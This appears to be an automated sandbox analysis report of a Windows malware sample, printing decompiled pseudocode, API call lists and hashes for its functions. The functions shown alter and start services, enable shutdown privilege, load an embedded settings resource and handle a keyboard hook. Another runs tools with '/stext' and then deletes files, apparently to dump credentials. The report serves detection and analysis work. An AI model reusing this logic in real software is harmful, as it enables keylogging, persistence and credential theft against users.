                                  Function 00411927, Relevance: 12.1, APIs: 8, Instructions: 64serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 48%
                                  			E00411927(void* _a4, signed char _a20) {
				short* _t6;
				signed int _t9;
				void* _t14;
				short* _t17;
				int _t19;
				void* _t21;
				void* _t22;

				_t17 = 0;
				_t6 = OpenSCManagerW(0, 0, 2);
				_t22 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t21 = OpenServiceW(_t22, _t6, 2);
				if(_t21 != 0) {
					_t19 =  &_a4 | 0xffffffff;
					_t9 = _a20 & 0x000000ff;
					if(_t9 == 0) {
						_push(4);
						goto L8;
					} else {
						_t14 = _t9 - 1;
						if(_t14 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t14 == 1) {
								_push(3);
								L8:
								_pop(_t19);
							}
						}
					}
					_t17 = _t17 & 0xffffff00 | ChangeServiceConfigW(_t21, 0xffffffff, _t19, 0xffffffff, _t17, _t17, _t17, _t17, _t17, _t17, _t17) != 0x00000000;
					CloseServiceHandle(_t22);
					CloseServiceHandle(_t21);
				} else {
					CloseServiceHandle(_t22);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t17;
			}










                                  0x0041192d
                                  0x00411933
                                  0x0041193e
                                  0x00411940
                                  0x0041194e
                                  0x00411952
                                  0x00411961
                                  0x00411964
                                  0x00411966
                                  0x00411976
                                  0x00000000
                                  0x00411968
                                  0x00411968
                                  0x00411969
                                  0x00411972
                                  0x00000000
                                  0x0041196b
                                  0x0041196c
                                  0x0041196e
                                  0x00411978
                                  0x00411978
                                  0x00411978
                                  0x0041196c
                                  0x00411969
                                  0x00411995
                                  0x00411998
                                  0x0041199b
                                  0x00411954
                                  0x00411955
                                  0x00411955
                                  0x004119a0
                                  0x004119ac

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,00410FD9), ref: 00411933
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00410FD9), ref: 00411986
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411998
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 0041199B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ChangeConfigManager
                                  • String ID:
                                  • API String ID: 760094045-0
                                  • Opcode ID: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction ID: c2fa0ded83cb97236bb08be5de2499f982cdcb79c4471a71361dcbc3e7912862
                                  • Opcode Fuzzy Hash: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction Fuzzy Hash: 2201D2B1120528BAE6001B709C99EFB3F5CEF453B0B044226F632961E0CA644D81C9E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411700, Relevance: 12.0, APIs: 8, Instructions: 42serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00411700(void* _a4) {
				short* _t5;
				signed int _t12;
				void* _t15;
				void* _t16;

				_t12 = 0;
				_t5 = OpenSCManagerW(0, 0, 0x10);
				_t16 = _t5;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t15 = OpenServiceW(_t16, _t5, 0x10);
				if(_t15 != 0) {
					_t12 = 0 | StartServiceW(_t15, 0, 0) != 0x00000000;
					CloseServiceHandle(_t16);
					CloseServiceHandle(_t15);
				} else {
					CloseServiceHandle(_t16);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t12;
			}







                                  0x00411706
                                  0x0041170c
                                  0x00411717
                                  0x00411719
                                  0x00411727
                                  0x0041172b
                                  0x00411748
                                  0x0041174b
                                  0x0041174e
                                  0x0041172d
                                  0x0041172e
                                  0x0041172e
                                  0x00411753
                                  0x0041175f

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,0041B310,?,?,0041130D), ref: 0041170C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000010,?,?,0041130D), ref: 00411719
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,0041130D), ref: 00411721
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041172E
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041130D), ref: 00411739
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174B
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041130D), ref: 00411753
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ManagerStart
                                  • String ID:
                                  • API String ID: 3595611540-0
                                  • Opcode ID: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                  • Instruction ID: 0126697ef4a7dd551ba317b87bbb1749c3aaf445346a94cf1b379eb6c3c08625
                                  • Opcode Fuzzy Hash: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                  • Instruction Fuzzy Hash: 04F06D71110528FFD3106FB1EC88DFF3F6CEE893A47044025F90692160CB749E869AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EC0F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E0040EC0F() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				signed int _t14;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				_t14 = GetLastError();
				asm("sbb eax, eax");
				return  ~( ~_t14);
			}







                                  0x0040ec23
                                  0x0040ec35
                                  0x0040ec46
                                  0x0040ec4d
                                  0x0040ec54
                                  0x0040ec5a
                                  0x0040ec62
                                  0x0040ec68

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?,0041B310,?,?,?,?,?,0040DF86), ref: 0040EC1C
                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0040DF86), ref: 0040EC23
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040EC35
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040EC54
                                  • GetLastError.KERNEL32 ref: 0040EC5A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                  • String ID: SeShutdownPrivilege
                                  • API String ID: 3534403312-3733053543
                                  • Opcode ID: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction ID: 48ce616a36d9155281e91bb523584d4266b4366c7e509a05eb39360af07fb4fb
                                  • Opcode Fuzzy Hash: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction Fuzzy Hash: EFF01271941129FBDB00ABE0ED0DAEF7EBCEB49744F104120B906E1090C6749A08CAA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409D02, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00409D02(void** _a4) {
				void* _t4;
				long _t5;
				struct HRSRC__* _t7;

				_t7 = FindResourceA(0, "SETTINGS", 0xa);
				_t4 = LockResource(LoadResource(0, _t7));
				_t5 = SizeofResource(0, _t7);
				 *_a4 = _t4;
				return _t5;
			}






                                  0x00409d16
                                  0x00409d22
                                  0x00409d2d
                                  0x00409d37
                                  0x00409d3b

                                  APIs
                                  • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                  • LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                  • LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID: SETTINGS
                                  • API String ID: 3473537107-594951305
                                  • Opcode ID: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction ID: dff85c0b1422ab4955d2beb391fe13d27272d16ce83a247481c219f138c774b2
                                  • Opcode Fuzzy Hash: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction Fuzzy Hash: 27E09A31641714EBD6101BE5AC0DFDA7E78EBCAB63F0140A5FA098B1D0C561440086A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040532D, Relevance: 4.6, APIs: 3, Instructions: 63keyboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040532D(struct HHOOK__** _a4, int _a8, int _a12, void* _a16) {
				void* _t19;
				void* _t26;
				struct HHOOK__** _t32;
				signed int _t33;

				_t32 = _a4;
				_t33 = 5;
				memcpy( &(_t32[0x10]), _a16, _t33 << 2);
				if(_a8 == 0) {
					_t19 = _a12 - 0x100;
					if(_t19 == 0) {
						if(GetKeyState(0x14) == 0 || GetKeyState(0x14) == 0xff80) {
							_t32[0xb] = _t32[0xb] & 0x00000000;
						} else {
							_t32[0xb] = 1;
						}
						E00406BA7(_t32);
						E00406BCB(_t32);
						E00405EB2(_t32);
						if(_t32[0xb] == 0) {
							E00406952(_t32);
						}
						_t32[0xb] = _t32[0xb] & 0x00000000;
					} else {
						_t26 = _t19 - 1;
						if(_t26 == 0) {
							E00406BB9(_t32);
							E00406BDD(_t32);
							E00406B61(_t32);
						} else {
							if(_t26 == 3) {
								E00406AD1(_t32);
							}
						}
					}
				}
				return CallNextHookEx( *_t32, _a8, _a12, _a16);
			}







                                  0x00405335
                                  0x00405342
                                  0x00405343
                                  0x00405345
                                  0x0040534a
                                  0x0040534f
                                  0x00405386
                                  0x00405398
                                  0x00405392
                                  0x00405392
                                  0x00405392
                                  0x0040539e
                                  0x004053a5
                                  0x004053ac
                                  0x004053b5
                                  0x004053b9
                                  0x004053b9
                                  0x004053be
                                  0x00405351
                                  0x00405351
                                  0x00405352
                                  0x00405364
                                  0x0040536b
                                  0x00405372
                                  0x00405354
                                  0x00405357
                                  0x0040535b
                                  0x0040535b
                                  0x00405357
                                  0x00405352
                                  0x0040534f
                                  0x004053d7

                                  APIs
                                  • GetKeyState.USER32(00000014), ref: 00405381
                                  • GetKeyState.USER32(00000014), ref: 0040538A
                                    • Part of subcall function 00406AD1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415D38,?), ref: 00406B51
                                  • CallNextHookEx.USER32 ref: 004053CD
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: StateV?$allocator@$??0?$basic_string@CallD@1@@D@2@@std@@D@std@@HookNextU?$char_traits@
                                  • String ID:
                                  • API String ID: 98962008-0
                                  • Opcode ID: c30bd8d7f5eb3adc70798307367016ec926e5b8f9707ec8e3c3983b96fba1221
                                  • Instruction ID: db2238219e7acabf410f467048d0031229e8bae0499535dbb57e9f22420807a3
                                  • Opcode Fuzzy Hash: c30bd8d7f5eb3adc70798307367016ec926e5b8f9707ec8e3c3983b96fba1221
                                  • Instruction Fuzzy Hash: A0118E7520461996DF10AF3588817AF3A21EB85344F05547EB9426A2C2CABC98259B5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405156, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405156(void* __ecx) {
				signed int _t3;
				signed int _t4;
				intOrPtr _t6;
				intOrPtr _t7;
				void* _t8;

				_t8 = __ecx;
				_t3 = GetKeyboardLayout(0);
				_t4 = _t3 & 0x000003ff;
				_t6 = 9;
				if(_t4 == _t6) {
					L3:
					 *((intOrPtr*)(_t8 + 0x38)) = _t6;
					return _t4;
				} else {
					_t7 = 0x10;
					if(_t4 != _t7) {
						goto L3;
					} else {
						 *((intOrPtr*)(_t8 + 0x38)) = _t7;
						return _t4;
					}
				}
			}








                                  0x00405157
                                  0x0040515b
                                  0x00405163
                                  0x00405168
                                  0x0040516c
                                  0x0040517b
                                  0x0040517b
                                  0x0040517f
                                  0x0040516e
                                  0x00405170
                                  0x00405174
                                  0x00000000
                                  0x00405176
                                  0x00405176
                                  0x0040517a
                                  0x0040517a
                                  0x00405174

                                  APIs
                                  • GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayout
                                  • String ID:
                                  • API String ID: 194098044-0
                                  • Opcode ID: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                  • Instruction ID: 21b9efa670f21c68742e6ddf4daf796ac161ac54f97a083ce8069b5058884fb0
                                  • Opcode Fuzzy Hash: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                  • Instruction Fuzzy Hash: 27D05E36948B204EE764A618B882BE232A0EB94731F95443BE5821AAD4E5A468C20658
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004124A0, Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E004124A0(intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr* _t10;

				_t10 = _a4;
				_t6 = _a8;
				asm("cpuid");
				 *_t10 = _t6;
				 *((intOrPtr*)(_t10 + 4)) = _t7;
				 *((intOrPtr*)(_t10 + 8)) = 0;
				 *((intOrPtr*)(_t10 + 0xc)) = __edx;
				return _t6;
			}






                                  0x004124a5
                                  0x004124a8
                                  0x004124ad
                                  0x004124af
                                  0x004124b1
                                  0x004124b4
                                  0x004124b7
                                  0x004124bd

                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                  • Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
                                  • Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                  • Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AE6A, Relevance: 173.7, APIs: 98, Strings: 1, Instructions: 485filesleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                    • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                    • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                    • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                    • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AF9F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFB2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFBB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFC4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFCD
                                  • Sleep.KERNEL32(00000064), ref: 0040AFDD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AFE6
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AFFA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B00C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B019
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B026
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B030
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B043
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B04C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B055
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B066
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B07D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B08F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B09C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B0A9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B0B3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0C7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0E2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B0EB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B0FF
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B111
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B11E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B12B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B135
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B149
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B152
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B15B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B164
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B196
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1AF
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B1B6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1C5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1E1
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B1E8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1F1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B20A
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B211
                                  • Sleep.KERNEL32(000001F4), ref: 0040B22A
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415B14), ref: 0040B243
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,0041B310,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B28B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B29B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B2AB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?), ref: 0040B2B8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000), ref: 0040B2C5
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040B2D2
